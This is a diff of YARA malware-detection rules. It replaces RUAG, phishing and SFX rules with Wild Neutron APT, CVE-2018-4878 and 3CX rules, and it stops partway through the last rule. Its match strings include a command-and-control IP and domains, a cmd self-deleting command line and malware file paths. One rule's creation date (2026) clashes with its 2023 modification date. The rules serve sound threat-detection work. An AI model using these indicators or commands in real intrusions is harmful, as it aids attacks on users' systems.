-		$s2 = "key = kerberos.ntlmhash(args.password)" fullword ascii
-		$s3 = "help='the password used to decrypt/encrypt the ticket')" fullword ascii
-		$s4 = "newencserverticket = kerberos.encrypt(key, 2, e, nonce)" fullword ascii
+		$s0 = "LiveUpdater.exe" fullword wide
+		$s1 = "id-at-postalAddress" fullword ascii
+		$s2 = "%d -> %d (default)" fullword wide
+		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s8 = "id-ce-keyUsage" fullword ascii
+		$s9 = "Key Usage" fullword ascii
+		$s32 = "UPDATE_ID" fullword wide
+		$s37 = "id-at-commonName" fullword ascii
+		$s38 = "2008R2" fullword wide
+		$s39 = "RSA-alt" fullword ascii
+		$s40 = "%02d.%04d.%s" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_SFX_Runprogram_Wscript : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_2 : FILE
 {
 	meta:
-		description = "Detects suspicious SFX that runs wscript.exe"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e12cea50-a939-5f69-963c-d6d1cb133e92"
-		date = "2018-09-27"
+		id = "1893c251-f81a-5361-91fa-f91a6d1379d2"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_sfx.yar#L2-L20"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L36-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d00d83d4b25d80d0ca44fe1c3f3cd33ae5539d2d79c84bfdfcc470669d4f78c"
-		score = 75
+		hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
+		logic_hash = "3a796199a2e9f2711e5fbdc1050234a8f3c09f762bc645f49a705d9f112d9cdc"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "e3bb02c5985fc64759b9c2d3c5474d46237ce472b4a0101c6313dafa939de5a9"
-		hash2 = "0ecf88d4b32895b4819dec3acb62eaaa7035aa6292499d903f76af60fcec0d6a"
-		hash3 = "a7a48f5220bd1ebe04de258d71fdd001711c165d162bd45e8cfbe8964eddf01c"
-		hash4 = "b6fa4889d8a87d45706d92714d716025bf223c01929755321faac1ab0db94a88"
-		hash5 = "7117b39890659c7dd11e15092c5e5ea9495bec0ff2b6e25254f6e343ed6ca33d"
-		hash6 = "ec2afb63555986fa55b7f98ae57c57e1138acb404a0dd2fe4f3d315730b9898e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "RunProgram=\"wscript.exe" fullword ascii
+		$s0 = "rundll32.exe \"%s\",#1" fullword wide
+		$s1 = "IgfxUpt.exe" fullword wide
+		$s2 = "id-at-postalAddress" fullword ascii
+		$s3 = "Intel(R) Common User Interface" fullword wide
+		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s11 = "Key Usage" fullword ascii
+		$s12 = "Intel Integrated Graphics Updater" fullword wide
+		$s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_RUAG_Tavdig_Malformed_Executable : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_3 : FILE
 {
 	meta:
-		description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da6357d4-0cdb-5f30-9919-59858963cc41"
-		date = "2016-05-24"
+		id = "1c5d1442-b2be-5a34-b5c9-78aaf67072c4"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L9-L19"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L59-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2a6eb90cc77f4556da0b5b0211bf0c4759dae0d78e9c6b765eff0e9a34f52e0f"
+		hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
+		logic_hash = "16d511412576df2eb6d9646856d37bd94af7648cc602510696b74fa0534e405d"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$x1 = "178.162.197.9" fullword ascii
+		$x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide
+		$s1 = "LiveUpdater.exe" fullword wide
+		$s2 = "id-at-postalAddress" fullword ascii
+		$s3 = "%d -> %d (default)" fullword wide
+		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s5 = "id-at-serialNumber" fullword ascii
+		$s6 = "ECDSA with SHA256" fullword ascii
+		$s7 = "Acer LiveUpdater" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x0000AD0B
+		uint16( 0 ) == 0x5a4d and filesize < 2020KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_RUAG_Bot_Config_File : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_4 : FILE
 {
 	meta:
-		description = "Detects a specific config file used by malware in RUAG APT case"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa3d5f9e-0b23-5180-9e52-a7d705712747"
-		date = "2016-05-24"
+		id = "52ff5770-1ca4-54d9-b69d-8af0c392084e"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L21-L34"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L85-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "256808511233da446ec69db4f5a5e23a237296c100e79e78bbe5e4964fa5dde6"
+		hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
+		logic_hash = "4882b7c5f469615436490cd628ee3bb5b0dded43fb556ac6477cdadc6c8eff05"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[CONFIG]" ascii
-		$s2 = "name = " ascii
-		$s3 = "exe = cmd.exe" ascii
+		$x1 = "WinRAT-Win32-Release.exe" fullword ascii
+		$s0 = "rundll32.exe \"%s\",#1" fullword wide
+		$s1 = "RtlUpd.EXE" fullword wide
+		$s2 = "RtlUpd.exe" fullword wide
+		$s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide
+		$s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide
+		$s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s6 = "Key Usage" fullword ascii
+		$s7 = "id-at-serialNumber" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x4e4f435b and $s1 at 0 and $s2 and $s3 and filesize < 160
+		uint16( 0 ) == 0x5a4d and filesize < 1240KB and all of them
 }
-rule SIGNATURE_BASE_RUAG_Cobra_Malware : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_5 : FILE
 {
 	meta:
-		description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd2d591f-6f56-5c31-9f3c-3aa7d174c9a0"
-		date = "2016-05-24"
+		id = "0df63255-155d-56b9-b86b-491855983095"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L36-L47"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L110-L133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5576e8e465eb289e8da44009cb2237080c5b5c3eb6d7a337634d91c5d68ecd80"
+		hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
+		logic_hash = "57792a54c96c59a1e9ed961715c72187936aee6f001c2ed4f95ca84e799e9c8c"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
+		$s0 = "LiveUpdater.exe" fullword wide
+		$s1 = "id-at-postalAddress" fullword ascii
+		$s2 = "%d -> %d (default)" fullword wide
+		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+		$s4 = "sha-1WithRSAEncryption" fullword ascii
+		$s5 = "Postal code" fullword ascii
+		$s6 = "id-ce-keyUsage" fullword ascii
+		$s7 = "Key Usage" fullword ascii
+		$s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii
+		$s9 = "%02d.%04d.%s" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_RUAG_Cobra_Config_File : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_6 : FILE
 {
 	meta:
-		description = "Detects a config text file used by malware Cobra in RUAG case"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3899d95-acc9-55ca-9025-edecce755ca6"
-		date = "2016-05-24"
+		id = "c5d87cad-d1ca-5766-90c1-fc8ecfa3f14f"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L49-L71"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L135-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "703a89562f3a2e5692883892f468288276459ad528cd371b1ac226e1d1c4be02"
+		hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
+		logic_hash = "7dc7f9815f2b2c934ecf93f5813bdb87364b2b9e2a5aebc04f76cfff43e46d30"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "[NAME]" ascii
-		$s1 = "object_id=" ascii
-		$s2 = "[TIME]" ascii fullword
-		$s3 = "lastconnect" ascii
-		$s4 = "[CW_LOCAL]" ascii fullword
-		$s5 = "system_pipe" ascii
-		$s6 = "user_pipe" ascii
-		$s7 = "[TRANSPORT]" ascii
-		$s8 = "run_task_system" ascii
-		$s9 = "[WORKDATA]" ascii
-		$s10 = "address1" ascii
+		$s0 = "mshtaex.exe" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x4d414e5b and $h1 at 0 and 8 of ( $s* ) and filesize < 5KB
+		uint16( 0 ) == 0x5a4d and filesize < 310KB and all of them
 }
-rule SIGNATURE_BASE_RUAG_Exfil_Config_File : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_7 : FILE
 {
 	meta:
-		description = "Detects a config text file used in data exfiltration in RUAG case"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7057bc7b-7f8c-5db8-b7f3-f6c33487b122"
-		date = "2016-05-24"
+		id = "22561c55-4294-50c9-a9b9-7b4ed98eec09"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ruag.yar#L73-L90"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L151-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "379e8762932ca565f3bd35ec241aef2d0445fbe6182a041e4d4e16a1170202ef"
+		hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
+		logic_hash = "8a081932be8fd03c37a87486570a02a31756ba6bd125dbed7da9703197447ea5"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "[TRANSPORT]" ascii
-		$s1 = "system_pipe" ascii
-		$s2 = "spstatus" ascii
-		$s3 = "adaptable" ascii
-		$s4 = "post_frag" ascii
-		$s5 = "pfsgrowperiod" ascii
+		$s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii
+		$s1 = "PEM_read_bio_PrivateKey failed" fullword ascii
+		$s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii
+		$s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii
+		$s4 = "clapi32.dll" fullword ascii
+		$s5 = "Connection from %s port %d" fullword ascii
+		$s6 = "/usr/etc/ssh_known_hosts" fullword ascii
+		$s7 = "Version: %s - %s %s %s %s" fullword ascii
+		$s8 = "[-] connect()" fullword ascii
+		$s9 = "/bin/sh /usr/etc/sshrc" fullword ascii
+		$s10 = "kexecdhs.c" fullword ascii
+		$s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x4152545b and $h1 at 0 and all of ( $s* ) and filesize < 1KB
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_PHISH_Shellcode_Enc_Payload_Feb25 : FILE
+rule SIGNATURE_BASE_Wildneutron_Sample_9 : FILE
 {
 	meta:
-		description = "Detects unknown of phishing-delivered malware"
-		author = "X__Junior"
-		id = "8459c5ba-37ec-59bd-8d4a-5ab7b6bb4553"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "https://x.com/dtcert/status/1890384162818802135"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L1-L14"
+		description = "Wild Neutron APT Sample Rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dbfdbe8c-4a4a-5512-a03d-e9f80c853d48"
+		date = "2015-07-10"
+		modified = "2023-01-06"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L203-L223"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "247e6a648bb22d35095ba02ef4af8cfe0a4cdfa25271117414ff2e3a21021886"
-		logic_hash = "144323294a8353956adf7a9b2a316e1e7606e882f85b8187c016d5acdcc254cc"
-		score = 80
+		hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
+		logic_hash = "2029c94088e075cbcbae8d7d514cfc56add022d8776e59f04824d9ce9fd12794"
+		score = 60
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op1 = { 48 89 EA FF D0 48 89 E9 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 89 C7 48 89 C3 48 89 EA F3 A4 48 89 C1 41 FF D4 31 C9 FF D3}
+		$s0 = "http://get.adobe.com/flashplayer/" wide
+		$s4 = " Player Installer/Uninstaller" fullword wide
+		$s5 = "Adobe Flash Plugin Updater" fullword wide
+		$s6 = "uSOFTWARE\\Adobe" fullword wide
+		$s11 = "2008R2" fullword wide
+		$s12 = "%02d.%04d.%s" fullword wide
+		$s13 = "%d -> %d" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $op1
+		uint16( 0 ) == 0x5a4d and filesize < 1477KB and all of them
 }
-rule SIGNATURE_BASE_MAL_PHISH_Final_Payload_Feb25
+rule SIGNATURE_BASE_Wildneutron_Sample_10 : FILE
 {
 	meta:
-		description = "Detects possible final payload of phishing-delivered malware, where embedded shellcode is used to decrypt and execute the payload after user-supplied password input."
-		author = "X__Junior"
-		id = "9014e1f2-09c2-5ba0-8b7c-6ae8c069d1f7"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "https://x.com/dtcert/status/1890384162818802135"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L16-L35"
+		description = "Wild Neutron APT Sample Rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5654a36f-8502-5e18-b8f3-94d4add466a7"
+		date = "2015-07-10"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L225-L267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "de384aba6b0c6800095eb530954aa718d4ed96cccfc0b1e5e4d01404f3518a77"
-		logic_hash = "3251d68a019d873987966d46c9e474e5a1ebbca4a33a8bf1e3c3ce119db8ab8c"
-		score = 80
-		quality = 85
-		tags = ""
+		hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
+		logic_hash = "b282b6892f9cb6769bf0e302deaa8062fd69bfd51144bc06fc9501fde9537dae"
+		score = 60
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%lu: %s %s" wide
-		$s2 = "(Direct Inbound)" wide
-		$s3 = "(Primary Domain)" wide
-		$s4 = "(Forest Tree Root" wide
-		$s5 = "(Native Mode)" wide
-		$s6 = "(In Forest)" wide
-		$s7 = "(None)" wide
+		$n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii
+		$s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii
+		$s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii
+		$s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii
+		$s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii
+		$s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii
+		$s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii
+		$s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii
+		$s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii
+		$s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii
+		$s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii
+		$s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii
+		$x1 = "wdigestEx.dll" fullword ascii
+		$x2 = "dpcore16t.dll" fullword ascii
+		$x3 = "mspool.dll" fullword ascii
+		$x4 = "msvcse.exe" fullword ascii
+		$x5 = "mshtaex.exe" fullword wide
+		$x6 = "iastor32.exe" fullword ascii
+		$y1 = "Installer.exe" fullword ascii
+		$y2 = "Info: Process %s" fullword ascii
+		$y3 = "Error: GetFileTime %s 0x%x" fullword ascii
+		$y4 = "Install succeeded" fullword ascii
+		$y5 = "Error: RegSetValueExA 0x%x" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ( $s* ) and 1 of ( $x* ) and 3 of ( $y* ) ) )
 }
-rule SIGNATURE_BASE_SUSP_Sysinternals_Desktops_Anomaly_Feb25 : FILE
+rule SIGNATURE_BASE_APT_MAL_Wildneutron_Javacpl : FILE
 {
 	meta:
-		description = "Detects anomalies in Sysinternals Desktops binaries"
-		author = "Florian Roth"
-		id = "5a586222-9263-5079-be48-9cfa464440d4"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L37-L60"
+		description = "Wild Neutron APT Sample Rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "de82827e-61d4-559e-886a-78d5293ab141"
+		date = "2015-07-10"
+		modified = "2023-01-06"
+		old_rule_name = "WildNeutron_javacpl"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L272-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
-		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
-		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
-		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
-		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
-		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
-		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
-		logic_hash = "e17b831c9644cfe6a4c82537a01cb937007308d94eb2b78f97f5fbad3546404a"
-		score = 70
+		logic_hash = "c9cb6ab956d29df9f59520262ab308a0256747cc3c898979347304950e093098"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
+		hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
+		hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
 
 	strings:
-		$s1 = "Software\\Sysinternals\\Desktops" wide fullword
-		$s2 = "Sysinternals Desktops" wide fullword
-		$s3 = "http://www.sysinternals.com" wide fullword
+		$s1 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
+		$s2 = "cmdcmdline" wide fullword
+		$s3 = "\"%s\" /K %s" wide fullword
+		$s4 = "Process is not running any more" wide fullword
+		$s5 = "dpnxfsatz" wide fullword
+		$op1 = { ff d6 50 ff 15 ?? ?? 43 00 8b f8 85 ff 74 34 83 64 24 0c 00 e8 ?? ?? 02 00 }
+		$op2 = { b8 02 00 00 00 01 45 80 01 45 88 6a 00 47 52 89 7d 8c 03 d8 }
+		$op3 = { 8b c7 f7 f6 46 89 b5 c8 fd ff ff 0f b7 c0 8b c8 0f af ce 3b cf }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 350KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_SUSP_PE_Compromised_Certificate_Feb25 : FILE
+rule SIGNATURE_BASE_Crime_Ole_Loadswf_Cve_2018_4878 : PURPORTED_NORTH_KOREAN_ACTORS CVE_2018_4878 FILE
 {
 	meta:
-		description = "Detects suspicious PE files signed with a certificate used in a widespread phishing attack in February 2025"
-		author = "Jonathan Peters"
-		id = "2e6ad630-b24e-53b2-8ffe-622c51914568"
-		date = "2025-02-14"
-		modified = "2025-03-20"
-		reference = "https://x.com/DTCERT/status/1890384162818802135"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_phish_feb25.yar#L62-L85"
+		description = "Detects CVE-2018-4878"
+		author = "Vitali Kremez, Flashpoint"
+		id = "44797bbc-693b-5fcb-a4a4-4ebf3f4da725"
+		date = "2026-01-01"
+		modified = "2023-12-05"
+		reference = "hxxps://www[.]krcert[.]or[.kr/data/secNoticeView.do?bulletin_writing_sequence=26998"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ole_loadswf_cve_2018_4878.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b8f64e090c7c9012e656c222682dfae7910669c7b7afaca35829cd1cc2eac17"
-		hash = "d0f7f3f58e0dfcfd81235379bb5a236f40be490207d3bf45f190a264879090db"
-		hash = "a83dc4d69a3de72aed4d1933db2ca120657f06adc6683346afbd267b8b7d27d0"
-		hash = "9ebfe694914d337304edded8b6406bd3fbff1d4ee110ef3a8bf95c3fb5de7c38"
-		hash = "9a5b9d89686de129a7b1970d5804f0f174156143ccfcd2cf669451c1ad4ab97e"
-		hash = "ff82c4c679c5486aed2d66a802682245a1e9cd7d6ceb65fa0e7b222f902998e8"
-		hash = "1da91d2570329f9e214f51bc633283f10bd55a145b7b3d254e03175fd86292d9"
-		logic_hash = "8f352ce00bcb64427bef89a9fc180d2451aeb4aa05432881a4754b4fb503c94a"
-		score = 60
+		logic_hash = "716cad0c5a12cc360522e2649c7870a493bef4bec3d55c3a3e235f3a85c02a56"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "PURPORTED NORTH KOREAN ACTORS, CVE-2018-4878, FILE"
+		vuln_type = "Remote Code Execution"
+		vuln_impact = "Use-after-free"
+		affected_versions = "Adobe Flash 28.0.0.137 and earlier versions"
+		mitigation0 = "Implement Protected View for Office documents"
+		mitigation1 = "Disable Adobe Flash"
+		weaponization = "Embedded in Microsoft Office first payloads"
+		actor = "Purported North Korean actors"
 
 	strings:
-		$sb1 = { 44 B8 66 73 57 BB 95 65 1D 61 D0 61 }
-		$sb2 = { 4F 23 43 D9 61 54 B9 41 DB 0A 26 B2 }
-		$sb3 = { 40 A3 62 E3 50 68 91 19 F5 2E C3 4C }
+		$header = "rdf:RDF" wide ascii
+		$title = "Adobe Flex" wide ascii
+		$pdb = "F:\\work\\flash\\obfuscation\\loadswf\\src" wide ascii
+		$s0 = "URLRequest" wide ascii
+		$s1 = "URLLoader" wide ascii
+		$s2 = "loadswf" wide ascii
+		$s3 = "myUrlReqest" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20MB and 1 of them
+		filesize < 500KB and all of ( $header* ) and all of ( $title* ) and 3 of ( $s* ) or all of ( $pdb* ) and all of ( $header* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_SUSP_Autocad_Lsp_Malware : FILE
+
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1 : FILE
 {
 	meta:
-		description = "Recognizes malicious autocad files written in LISP"
-		author = "John Lambert @JohnLaTwC"
-		id = "3a4ac6e1-d7ea-5b9a-a386-9f881fad073b"
-		date = "2019-02-04"
-		modified = "2023-12-05"
-		reference = "http://cadablog.blogspot.com/2012/06/acadmedrea-malware-autocad-based-virus.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_autocad_lsp_malware.yar#L1-L52"
+		description = "Detects malicious DLLs related to 3CX compromise"
+		author = "X__Junior, Florian Roth (Nextron Systems)"
+		id = "a6ea3299-fde5-5206-b5db-eb3a3f5944d9"
+		date = "2023-03-29"
+		modified = "2023-04-20"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
